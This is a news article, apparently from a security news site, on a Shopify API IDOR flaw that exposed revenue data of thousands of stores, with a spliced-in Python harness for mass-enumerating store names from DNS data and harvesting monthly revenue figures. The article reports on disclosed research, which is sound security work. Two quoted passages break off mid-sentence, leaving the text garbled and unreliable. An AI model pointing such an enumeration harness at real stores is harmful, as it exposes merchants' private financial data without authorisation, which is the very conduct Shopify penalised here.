Bug bounty hunter Ayoub Fathi discovered a vulnerability in a Shopify API endpoint that could be exploited to leak the revenue and traffic data of thousands of stores.
The Shopify platform is currently used by 800,000 different online merchants in more than 175 countries.
The white hat hacker analyzed the APIs Shopify had published over the past year that let users fetch sales data for graph presentations. He noticed that the system was leaking the revenue data of two unnamed Shopify stores, one of which had already been removed from the platform.
The researcher then ran a mass check on all existing stores to determine whether the endpoint was affected by an Insecure Direct Object Reference (IDOR) issue, iterating over $storeName to see whether any customer data leaked through the API.
“The first idea that came to mind is to perform a mass check on eventually all existing stores, and see if we would get any customer data out of any,” reads a post published by the researcher.
“The attack process will be as follows:
Fathi found that 4 out of 1,000 stores (one of which was closed) were vulnerable. He then decided to run further tests with a larger dataset of 813,684 records built from Forward DNS data.
“Using this approach, we don’t need to
The hacker created an exploit.py script to use the new wordlist of 813K store names.
With this approach the expert retrieved a list of vulnerable stores and queried each one to obtain its monthly revenue data, in USD, over the store's lifetime.
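The workflow described above (build a store-name wordlist from a Forward DNS dump, hit the endpoint once per $storeName, and sort the responses into exposed, closed and legitimately public stores) is easy to misread as "count the 200s". The following is an added example written for this article, not Fathi's exploit.py and not Shopify code; the leaking endpoint is not named in the article, so ENDPOINT is a placeholder, the `listed_for_sale` flag used to separate stores that publish sales data on purpose from stores that should not is a hypothetical field, and the fetcher is an offline stub over constructed responses rather than live HTTP.

```python
"""IDOR mass-check harness (added example; endpoint and fields are assumptions)."""
import json
from typing import Callable, Dict, Iterable, List, Tuple

# Placeholder: the article does not identify the leaking endpoint.
ENDPOINT = "https://{store}.myshopify.com/<unnamed-endpoint>"

Response = Tuple[int, str]            # (HTTP status, response body)
Fetcher = Callable[[str], Response]   # injected so the harness runs offline


def store_names_from_fdns(lines: Iterable[str]) -> List[str]:
    """Extract unique *.myshopify.com store names from a Forward DNS dump.

    Accepts either bare hostnames or Rapid7-style JSON lines with a "name"
    field (assumed format; constructed input below). Order of first sight is kept.
    """
    seen: Dict[str, None] = {}
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        if raw.startswith("{"):
            try:
                host = json.loads(raw).get("name", "")
            except ValueError:
                continue
        else:
            host = raw
        host = host.lower()
        if host.endswith(".myshopify.com"):
            name = host[: -len(".myshopify.com")]
            if name and "." not in name:      # skip sub-subdomains
                seen.setdefault(name, None)
    return list(seen)


def fetch_store(store: str, fetch: Fetcher) -> Response:
    return fetch(ENDPOINT.format(store=store))


def classify(status: int, body: str) -> str:
    """Bucket one response: missing, error, no-data, closed, public or leaking."""
    if status == 404:
        return "missing"
    if status != 200:
        return "error"
    try:
        data = json.loads(body)
    except ValueError:
        return "error"                        # HTML error page, WAF block, etc.
    if not isinstance(data, dict) or "monthly_revenue_usd" not in data:
        return "no-data"
    if data.get("closed"):
        return "closed"                       # store removed, data still served
    # Hypothetical flag: a store listed for sale publishes its figures on
    # purpose; any other store returning revenue is an unauthorised disclosure.
    return "public" if data.get("listed_for_sale") else "leaking"


def mass_check(stores: Iterable[str], fetch: Fetcher) -> Dict[str, List[str]]:
    """Run the IDOR check over every candidate name and group by bucket."""
    buckets: Dict[str, List[str]] = {}
    for store in stores:
        status, body = fetch_store(store, fetch)
        buckets.setdefault(classify(status, body), []).append(store)
    return buckets


def revenue_series(store: str, fetch: Fetcher) -> List[Tuple[str, float]]:
    """Return (month, USD) pairs for a store already known to respond."""
    status, body = fetch_store(store, fetch)
    if classify(status, body) not in ("leaking", "public"):
        return []
    months = json.loads(body)["monthly_revenue_usd"]
    return sorted((m, float(v)) for m, v in months.items())


# Constructed sample responses standing in for the live endpoint.
SAMPLE_RESPONSES: Dict[str, Response] = {
    "alpha-goods": (200, json.dumps({"monthly_revenue_usd": {"2018-09": 1450.5, "2018-08": 1200.0},
                                     "listed_for_sale": False})),
    "beta-shop": (200, json.dumps({"monthly_revenue_usd": {"2018-09": 300.0},
                                   "listed_for_sale": True})),
    "gamma-store": (200, json.dumps({"monthly_revenue_usd": {}, "closed": True})),
    "epsilon": (200, "<html>not json</html>"),
}

SAMPLE_FDNS = [
    "alpha-goods.myshopify.com",
    '{"timestamp":"1538000000","name":"beta-shop.myshopify.com","type":"a","value":"203.0.113.5"}',
    "gamma-store.myshopify.com",
    "alpha-goods.myshopify.com",          # duplicate record
    "delta.myshopify.com",
    "cdn.epsilon.myshopify.com",          # sub-subdomain, skipped
    "epsilon.myshopify.com",
    "unrelated.example.com",
]


def fake_fetch(url: str) -> Response:
    store = url.split("//", 1)[1].split(".", 1)[0]
    return SAMPLE_RESPONSES.get(store, (404, ""))


if __name__ == "__main__":
    names = store_names_from_fdns(SAMPLE_FDNS)
    for bucket, stores in sorted(mass_check(names, fake_fetch).items()):
        print(f"{bucket:8s} {len(stores):3d} {stores}")
    for month, usd in revenue_series("alpha-goods", fake_fetch):
        print(month, usd)
```

The point of the buckets is the part of the write-up that matters for impact: a closed store still answering with revenue, and a live store answering without being listed for sale, are both disclosures, while stores that publish their figures deliberately are not, which is why the raw number of 200 responses overstates the vulnerable population. Against a real target the fetcher would also need rate limiting and, as the outcome of this report shows, should only be pointed at stores the tester owns.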
“This was tested on 800K merchant stores: +12,100 of them were exposed, +8,700 were vulnerable stores whose sales and traffic data we were able to obtain and which should not be public, and 3,400 are expected to have their sales data public,” wrote Fathi. “To summarize:
The researcher discovered that the leak was caused by the Shopify Exchange App.
Fathi reported the flaw to Shopify on 13 October 2018; the company acknowledged it on October 16 and closed it on November 1.
The bad news is that Shopify did not award the researcher a bounty, citing a policy violation: he had tested shops that were not created for testing purposes.
Below is an excerpt of the email Shopify sent to the researcher:
“While we appreciate you were trying to demonstrate the impact of the identified issue, intentionally accessing information of other merchants and not immediately reporting this to us is of significant concern to Shopify. As a result, this report will not be awarded a bug bounty.”
(SecurityAffairs – hacking, Shopify)